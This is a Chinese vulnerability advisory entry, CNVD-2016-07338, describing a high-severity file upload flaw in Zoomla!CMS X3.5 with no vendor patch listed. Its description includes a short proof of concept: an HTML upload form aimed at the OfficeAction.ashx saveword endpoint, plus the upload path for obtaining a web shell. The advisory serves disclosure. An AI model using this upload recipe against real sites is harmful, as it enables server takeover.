|
>>网络安全 |
|
Zoomla!CMS最新版文件上传漏洞
|
Zoomla!CMS最新版文件上传漏洞
CNVD-ID |
CNVD-2016-07338 |
录入时间 |
2016-09-08 |
危害级别 |
高危 评分:10 |
报送时间 |
2016-09-07 |
产生原因 |
设计错误 |
归档时间 |
2016-09-08 |
引发威胁 |
管理员访问权限获取 |
公开时间 |
2016-12-07 |
攻击位置 |
远程 |
发现时间 |
2016-09-07 |
影响对象类型 |
WEB应用漏洞 |
是否热点漏洞 |
否 |
涉及厂商 |
逐浪软件 |
影响产品 |
逐浪软件 Zoomla!CMS2 X3.5 |
漏洞描述 |
Zoomla!逐浪CMS是CMS网站内核与管理系统研发厂商,集成内容管理、商城、OA、SNS、项目管理、采集、邮件订阅百项功能,基于.net平台并支持跨平台与移动。 Zoomla!CMS最新版存在文件上传漏洞。通过本地制作一个html页面 <form action="http://192.168.2.85:8889/Plugins/Office/OfficeAction.ashx?Action=saveword" method="post" enctype="multipart/form-data" name="file"> <input name="files" type="file" /> <input name="11" type="submit" value="111" /> </form>选一个图片木马,直接上传返回为true,上传成功。默认情况下的程序会自动生成一个0目录存在上传的文件,具体路径是UploadFiles\OA\0,由于上传后未能对重命名操作,成功获得shell。 |
参考链接 |
http://loudong.360.cn/vul/info/id/175200 https://butian.360.cn/vul/info/qid/QTVA-2016-525605 |
解决方案 |
厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: https://www.z01.com/ |
厂商补丁 |
(暂无补丁信息) |
验证信息 |
未验证 |
|
|
|